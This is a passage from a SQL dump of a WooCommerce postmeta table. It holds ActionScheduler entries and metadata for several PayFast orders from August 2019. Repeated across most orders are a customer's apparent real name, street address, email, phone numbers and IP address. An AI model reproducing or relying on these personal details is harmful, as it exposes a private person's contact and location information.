nScheduler_IntervalSchedule\0start_timestamp\";i:1564736612;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18187,32101,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564736612;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18188,32071,'_edit_lock','1564733933:1'),(18189,32034,'_edit_lock','1564733801:1'),(18190,32102,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564735368;}'),(18191,32104,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564735373;}'),(18192,32103,'_order_key','wc_order_CNvwWnO8ifbuP'),(18193,32103,'_customer_user','3'),(18194,32103,'_payment_method','payfast'),(18195,32103,'_payment_method_title','PayFast'),(18196,32103,'_customer_ip_address','165.255.71.243'),(18197,32103,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(18198,32103,'_created_via','checkout'),(18199,32103,'_cart_hash','165f8f75087c09e7843a4545625353bf'),(18200,32103,'_billing_first_name','Nazeer'),(18201,32103,'_billing_last_name','Abrahams'),(18202,32103,'_billing_company','Awesome-Inc'),(18203,32103,'_billing_address_1','9 jade close'),(18204,32103,'_billing_address_2','Ext 11'),(18205,32103,'_billing_city','Ennerdale'),(18206,32103,'_billing_state','GP'),(18207,32103,'_billing_postcode','1825'),(18208,32103,'_billing_country','ZA'),(18209,32103,'_billing_email','nazeer3791@gmail.com'),(18210,32103,'_billing_phone','0609834775'),(18211,32103,'_order_currency','ZAR'),(18212,32103,'_cart_discount','0'),(18213,32103,'_cart_discount_tax','0'),(18214,32103,'_order_shipping','0.00'),(18215,32103,'_order_shipping_tax','0'),(18216,32103,'_order_tax','0'),(18217,32103,'_order_total','750.00'),(18218,32103,'_order_version','3.6.5'),(18219,32103,'_prices_include_tax','no'),(18220,32103,'_billing_address_index','Nazeer Abrahams Awesome-Inc 9 jade close Ext 11 Ennerdale GP 1825 ZA nazeer3791@gmail.com 0609834775'),(18221,32103,'_shipping_address_index','        '),(18222,32103,'is_vat_exempt','no'),(18223,32105,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564735368;}'),(18224,32103,'es_wc_activecampaign_opt_in','no'),(18225,32106,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564735395;}'),(18226,32103,'_date_completed','1564735395'),(18227,32103,'_date_paid','1564735395'),(18228,32103,'_paid_date','2019-08-02 10:43:15'),(18229,32103,'_completed_date','2019-08-02 10:43:15'),(18230,32103,'_download_permissions_granted','yes'),(18231,32103,'_recorded_sales','yes'),(18232,32103,'_recorded_coupon_usage_counts','yes'),(18233,32103,'_order_stock_reduced','yes'),(18234,32103,'_bewpi_invoice_date','2019-08-02 10:43:15'),(18235,32103,'_bewpi_invoice_number','32103'),(18236,32103,'_bewpi_invoice_pdf_path','/32103-2019.pdf'),(18237,32103,'bewpi_pdf_invoice_sent','1'),(18238,32107,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564736361;}'),(18239,32109,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564736366;}'),(18240,32108,'_order_key','wc_order_1YEp6FayCJpe2'),(18241,32108,'_customer_user','3'),(18242,32108,'_payment_method','payfast'),(18243,32108,'_payment_method_title','PayFast'),(18244,32108,'_customer_ip_address','165.255.71.243'),(18245,32108,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(18246,32108,'_created_via','checkout'),(18247,32108,'_cart_hash','b830c3fbcf4e2cccd5244d6db31e0573'),(18248,32108,'_billing_first_name','Nazeer'),(18249,32108,'_billing_last_name','Abrahams'),(18250,32108,'_billing_company','Awesome-Inc'),(18251,32108,'_billing_address_1','9 jade close'),(18252,32108,'_billing_address_2','Ext 11'),(18253,32108,'_billing_city','Ennerdale'),(18254,32108,'_billing_state','GP'),(18255,32108,'_billing_postcode','1825'),(18256,32108,'_billing_country','ZA'),(18257,32108,'_billing_email','nazeer3791@gmail.com'),(18258,32108,'_billing_phone','0609834775'),(18259,32108,'_order_currency','ZAR'),(18260,32108,'_cart_discount','551'),(18261,32108,'_cart_discount_tax','0'),(18262,32108,'_order_shipping','0.00'),(18263,32108,'_order_shipping_tax','0'),(18264,32108,'_order_tax','0'),(18265,32108,'_order_total','199.00'),(18266,32108,'_order_version','3.6.5'),(18267,32108,'_prices_include_tax','no'),(18268,32108,'_billing_address_index','Nazeer Abrahams Awesome-Inc 9 jade close Ext 11 Ennerdale GP 1825 ZA nazeer3791@gmail.com 0609834775'),(18269,32108,'_shipping_address_index','        '),(18270,32108,'is_vat_exempt','no'),(18271,32110,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564736361;}'),(18272,32108,'es_wc_activecampaign_opt_in','no'),(18273,32111,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564736385;}'),(18274,32108,'_date_completed','1564736386'),(18275,32108,'_date_paid','1564736386'),(18276,32108,'_paid_date','2019-08-02 10:59:46'),(18277,32108,'_completed_date','2019-08-02 10:59:46'),(18278,32112,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564736386;}'),(18279,32108,'_download_permissions_granted','yes'),(18280,32108,'_recorded_sales','yes'),(18281,32108,'_recorded_coupon_usage_counts','yes'),(18282,29812,'_used_by','3'),(18283,32108,'_order_stock_reduced','yes'),(18284,32108,'_bewpi_invoice_date','2019-08-02 10:59:46'),(18285,32108,'_bewpi_invoice_number','32108'),(18286,32108,'_bewpi_invoice_pdf_path','/32108-2019.pdf'),(18287,32108,'bewpi_pdf_invoice_sent','1'),(18288,32113,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564740295;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18289,32114,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564740295;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18290,32116,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564737039;}'),(18291,32115,'_order_key','wc_order_pf8Q4OE25BpxO'),(18292,32115,'_customer_user','0'),(18293,32115,'_payment_method','payfast'),(18294,32115,'_payment_method_title','PayFast'),(18295,32115,'_customer_ip_address','165.255.71.243'),(18296,32115,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(18297,32115,'_created_via','checkout'),(18298,32115,'_cart_hash','b830c3fbcf4e2cccd5244d6db31e0573'),(18299,32115,'_billing_first_name','Bat'),(18300,32115,'_billing_last_name','Man'),(18301,32115,'_billing_company','Awesome-Inc'),(18302,32115,'_billing_address_1','9 jade close, ext 11'),(18303,32115,'_billing_address_2','Ennerdale'),(18304,32115,'_billing_city','johannesburg'),(18305,32115,'_billing_state','GP'),(18306,32115,'_billing_postcode','1827'),(18307,32115,'_billing_country','ZA'),(18308,32115,'_billing_email','nazeer3791@gmail.com'),(18309,32115,'_billing_phone','079 137 2700'),(18310,32115,'_order_currency','ZAR'),(18311,32115,'_cart_discount','551'),(18312,32115,'_cart_discount_tax','0'),(18313,32115,'_order_shipping','0.00'),(18314,32115,'_order_shipping_tax','0'),(18315,32115,'_order_tax','0'),(18316,32115,'_order_total','199.00'),(18317,32115,'_order_version','3.6.5'),(18318,32115,'_prices_include_tax','no'),(18319,32115,'_billing_address_index','Bat Man Awesome-Inc 9 jade close, ext 11 Ennerdale johannesburg GP 1827 ZA nazeer3791@gmail.com 079 137 2700'),(18320,32115,'_shipping_address_index','        '),(18321,32115,'is_vat_exempt','no'),(18322,32117,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564737034;}'),(18323,32115,'es_wc_activecampaign_opt_in','no'),(18324,32115,'_ga_tracked','1'),(18325,32118,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564737058;}'),(18326,32115,'_date_completed','1564737058'),(18327,32115,'_date_paid','1564737058'),(18328,32115,'_paid_date','2019-08-02 11:10:58'),(18329,32115,'_completed_date','2019-08-02 11:10:58'),(18330,32115,'_download_permissions_granted','yes'),(18331,32115,'_recorded_sales','yes'),(18332,32115,'_recorded_coupon_usage_counts','yes'),(18333,29812,'_used_by','nazeer3791@gmail.com'),(18334,32115,'_order_stock_reduced','yes'),(18335,32115,'_bewpi_invoice_date','2019-08-02 11:10:58'),(18336,32115,'_bewpi_invoice_number','32115'),(18337,32115,'_bewpi_invoice_pdf_path','/32115-2019.pdf'),(18338,32115,'bewpi_pdf_invoice_sent','1'),(18339,32120,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564737292;}'),(18340,32119,'_order_key','wc_order_ny7P2S34aAHtC'),(18341,32119,'_customer_user','0'),(18342,32119,'_payment_method','payfast'),(18343,32119,'_payment_method_title','PayFast'),(18344,32119,'_customer_ip_address','165.255.71.243'),(18345,32119,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(18346,32119,'_created_via','checkout'),(18347,32119,'_cart_hash','165f8f75087c09e7843a4545625353bf'),(18348,32119,'_billing_first_name','Bat'),(18349,32119,'_billing_last_name','Man'),(18350,32119,'_billing_company','Awesome-Inc'),(18351,32119,'_billing_address_1','9 jade close, ext 11'),(18352,32119,'_billing_address_2','Ennerdale'),(18353,32119,'_billing_city','johannesburg'),(18354,32119,'_billing_state','GP'),(18355,32119,'_billing_postcode','1827'),(18356,32119,'_billing_country','ZA'),(18357,32119,'_billing_email','nazeer3791@gmail.com'),(18358,32119,'_billing_phone','079 137 2700'),(18359,32119,'_order_currency','ZAR'),(18360,32119,'_cart_discount','0'),(18361,32119,'_cart_discount_tax','0'),(18362,32119,'_order_shipping','0.00'),(18363,32119,'_order_shipping_tax','0'),(18364,32119,'_order_tax','0'),(18365,32119,'_order_total','750.00'),(18366,32119,'_order_version','3.6.5'),(18367,32119,'_prices_include_tax','no'),(18368,32119,'_billing_address_index','Bat Man Awesome-Inc 9 jade close, ext 11 Ennerdale johannesburg GP 1827 ZA nazeer3791@gmail.com 079 137 2700'),(18369,32119,'_shipping_address_index','        '),(18370,32119,'is_vat_exempt','no'),(18371,32121,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564737287;}'),(18372,32119,'es_wc_activecampaign_opt_in','no'),(18373,32119,'_ga_tracked','1'),(18374,32122,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564737313;}'),(18375,32119,'_date_completed','1564737313'),(18376,32119,'_date_paid','1564737313'),(18377,32119,'_paid_date','2019-08-02 11:15:13'),(18378,32119,'_completed_date','2019-08-02 11:15:13'),(18379,32119,'_download_permissions_granted','yes'),(18380,32119,'_recorded_sales','yes'),(18381,32119,'_recorded_coupon_usage_counts','yes'),(18382,32119,'_order_stock_reduced','yes'),(18383,32119,'_bewpi_invoice_date','2019-08-02 11:15:13'),(18384,32119,'_bewpi_invoice_number','32119'),(18385,32119,'_bewpi_invoice_pdf_path','/32119-2019.pdf'),(18386,32119,'bewpi_pdf_invoice_sent','1'),(18387,32123,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564745016;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18388,32124,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564745017;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18389,32125,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564748633;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18390,32126,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564748633;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18391,32127,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564746362;}'),(18392,32129,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564746367;}'),(18393,32128,'_order_key','wc_order_K4AIGuDaj4PtE'),(18394,32128,'_customer_user','3'),(18395,32128,'_payment_method','payfast'),(18396,32128,'_payment_method_title','PayFast'),(18397,32128,'_customer_ip_address','165.255.71.243'),(18398,32128,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(18399,32128,'_created_via','checkout'),(18400,32128,'_cart_hash','9df0309231b3d24518be997158fc3325'),(18401,32128,'_billing_first_name','Nazeer'),(18402,32128,'_billing_last_name','Abrahams'),(18403,32128,'_billing_company','Awesome-Inc'),(18404,32128,'_billing_address_1','9 jade close'),(18405,32128,'_billing_address_2','Ext 11'),(18406,32128,'_billing_city','Ennerdale'),(18407,32128,'_billing_state','GP'),(18408,32128,'_billing_postcode','1825'),(18409,32128,'_billing_country','ZA'),(18410,32128,'_billing_email','nazeer3791@gmail.com'),(18411,32128,'_billing_phone','0609834775'),(18412,32128,'_order_currency','ZAR'),(18413,32128,'_cart_discount','0'),(18414,32128,'_cart_discount_tax','0'),(18415,32128,'_order_shipping','0.00'),(18416,32128,'_order_shipping_tax','0'),(18417,32128,'_order_tax','0'),(18418,32128,'_order_total','4650.00'),(18419,32128,'_order_version','3.6.5'),(18420,32128,'_prices_include_tax','no'),(18421,32128,'_billing_address_index','Nazeer Abrahams Awesome-Inc 9 jade close Ext 11 Ennerdale GP 1825 ZA nazeer3791@gmail.com 0609834775'),(18422,32128,'_shipping_address_index','        '),(18423,32128,'is_vat_exempt','no'),(18424,32130,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564746362;}'),(18425,32128,'es_wc_activecampaign_opt_in','no'),(18426,32131,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564746387;}'),(18427,32132,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564746392;}'),(18428,32128,'_date_completed','1564746387'),(18429,32128,'_date_paid','1564746387'),(18430,32128,'_paid_date','2019-08-02 13:46:27'),(18431,32128,'_completed_date','2019-08-02 13:46:27'),(18432,32133,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564746387;}'),(18433,32128,'_download_permissions_granted','yes'),(18434,32128,'_recorded_sales','yes'),(18435,32128,'_recorded_coupon_usage_counts','yes'),(18436,32128,'_order_stock_reduced','yes'),(18437,32128,'_bewpi_invoice_date','2019-08-02 13:46:27'),(18438,32128,'_bewpi_invoice_number','32128'),(18439,32128,'_bewpi_invoice_pdf_path','/32128-2019.pdf'),(18440,32128,'bewpi_pdf_invoice_sent','1'),(18441,32134,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564752425;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18442,32135,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564752425;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18443,32136,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564750223;}'),(18444,32138,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564750228;}'),(18445,32137,'_order_key','wc_order_KPHiWdgMtUrv1'),(18446,32137,'_customer_user','3'),(18447,32137,'_payment_method','payfast'),(18448,32137,'_payment_method_title','PayFast'),(18449,32137,'_customer_ip_address','165.255.71.243'),(18450,32137,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(18451,32137,'_created_via','checkout'),(18452,32137,'_cart_hash','d199f32e8cddad257ae1b1febdf65d6f'),(18453,32137,'_billing_first_name','Nazeer'),(18454,32137,'_billing_last_name','Abrahams'),(18455,32137,'_billing_company','Awesome-Inc'),(18456,32137,'_billing_address_1','9 jade close'),(18457,32137,'_billing_address_2','Ext 11'),(18458,32137,'_billing_city','Ennerdale'),(18459,32137,'_billing_state','GP'),(18460,32137,'_billing_postcode','1825'),(18461,32137,'_billing_country','ZA'),(18462,32137,'_billing_email','nazeer3791@gmail.com'),(18463,32137,'_billing_phone','0609834775'),(18464,32137,'_order_currency','ZAR'),(18465,32137,'_cart_discount','0'),(18466,32137,'_cart_discount_tax','0'),(18467,32137,'_order_shipping','0.00'),(18468,32137,'_order_shipping_tax','0'),(18469,32137,'_order_tax','0'),(18470,32137,'_order_total','2250.00'),(18471,32137,'_order_version','3.6.5'),(18472,32137,'_prices_include_tax','no'),(18473,32137,'_billing_address_index','Nazeer Abrahams Awesome-Inc 9 jade close Ext 11 Ennerdale GP 1825 ZA nazeer3791@gmail.com 0609834775'),(18474,32137,'_shipping_address_index','        '),(18475,32137,'is_vat_exempt','no'),(18476,32139,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564750223;}'),(18477,32137,'es_wc_activecampaign_opt_in','no'),(18478,32140,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564750245;}'),(18479,32137,'_date_completed','1564750245'),(18480,32137,'_date_paid','1564750245'),(18481,32137,'_paid_date','2019-08-02 14:50:45'),(18482,32137,'_completed_date','2019-08-02 14:50:45'),(18483,32137,'_download_permissions_granted','yes'),(18484,32137,'_recorded_sales','yes'),(18485,32137,'_recorded_coupon_usage_counts','yes'),(18486,32137,'_order_stock_reduced','yes'),(18487,32137,'_bewpi_invoice_date','2019-08-02 14:50:45'),(18488,32137,'_bewpi_invoice_number','32137'),(18489,32137,'_bewpi_invoice_pdf_path','/32137-2019.pdf'),(18490,32137,'bewpi_pdf_invoice_sent','1'),(18491,32141,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564750686;}'),(18492,32143,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564750691;}'),(18493,32142,'_order_key','wc_order_HzPGLnA18eIgv'),(18494,32142,'_customer_user','3'),(18495,32142,'_payment_method','payfast'),(18496,32142,'_payment_method_title','PayFast'),(18497,32142,'_customer_ip_address','165.255.71.243'),(18498,32142,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(18499,32142,'_created_via','checkout'),(18500,32142,'_cart_hash','3550a31f647b598b1cd11e916b4a3481'),(18501,32142,'_billing_first_name','Nazeer'),(18502,32142,'_billing_last_name','Abrahams'),(18503,32142,'_billing_company','Awesome-Inc'),(18504,32142,'_billing_address_1','9 jade close'),(18505,32142,'_billing_address_2','Ext 11'),(18506,32142,'_billing_city','Ennerdale'),(18507,32142,'_billing_state','GP'),(18508,32142,'_billing_postcode','1825'),(18509,32142,'_billing_country','ZA'),(18510,32142,'_billing_email','nazeer3791@gmail.com'),(18511,32142,'_billing_phone','0609834775'),(18512,32142,'_order_currency','ZAR'),(18513,32142,'_cart_discount','0'),(18514,32142,'_cart_discount_tax','0'),(18515,32142,'_order_shipping','0.00'),(18516,32142,'_order_shipping_tax','0'),(18517,32142,'_order_tax','0'),(18518,32142,'_order_total','75.00'),(18519,32142,'_order_version','3.6.5'),(18520,32142,'_prices_include_tax','no'),(18521,32142,'_billing_address_index','Nazeer Abrahams Awesome-Inc 9 jade close Ext 11 Ennerdale GP 1825 ZA nazeer3791@gmail.com 0609834775'),(18522,32142,'_shipping_address_index','        '),(18523,32142,'is_vat_exempt','no'),(18524,32144,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564750687;}'),(18525,32142,'es_wc_activecampaign_opt_in','no'),(18526,32145,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564750709;}'),(18527,32146,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564750806;}'),(18528,32142,'_date_paid','1564750801'),(18529,32142,'_paid_date','2019-08-02 15:00:01'),(18530,32147,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564750801;}'),(18531,32142,'_download_permissions_granted','yes'),(18532,32142,'_recorded_sales','yes'),(18533,32142,'_recorded_coupon_usage_counts','yes'),(18534,32142,'_order_stock_reduced','yes'),(18535,32142,'_bewpi_invoice_date','2019-08-02 15:00:01'),(18536,32142,'_bewpi_invoice_number','32142'),(18537,32142,'_bewpi_invoice_pdf_path','/32142-2019.pdf'),(18538,32148,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564751119;}'),(18539,32142,'_date_completed','1564751114'),(18540,32142,'_completed_date','2019-08-02 15:05:14'),(18541,32149,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564751114;}'),(18542,32150,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564751114;}'),(18543,32142,'bewpi_pdf_invoice_sent','1'),(18544,32151,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564756204;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18545,32152,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564756204;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18546,32153,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564759881;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18547,32154,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564759881;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18548,32155,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564764188;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18549,32156,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564764188;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18550,32157,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564770769;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18551,32158,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564770769;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18552,32159,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564776266;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18553,32160,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564776266;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18554,32161,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564780211;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18555,32162,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564780211;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18556,32163,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564784289;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18557,32164,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564784289;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18558,32165,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564787892;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18559,32166,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564787892;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18560,32167,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564793041;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18561,32168,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564793041;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18562,32169,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564796758;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18563,32170,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564796758;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18564,32171,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564801856;s:53:\"\0Act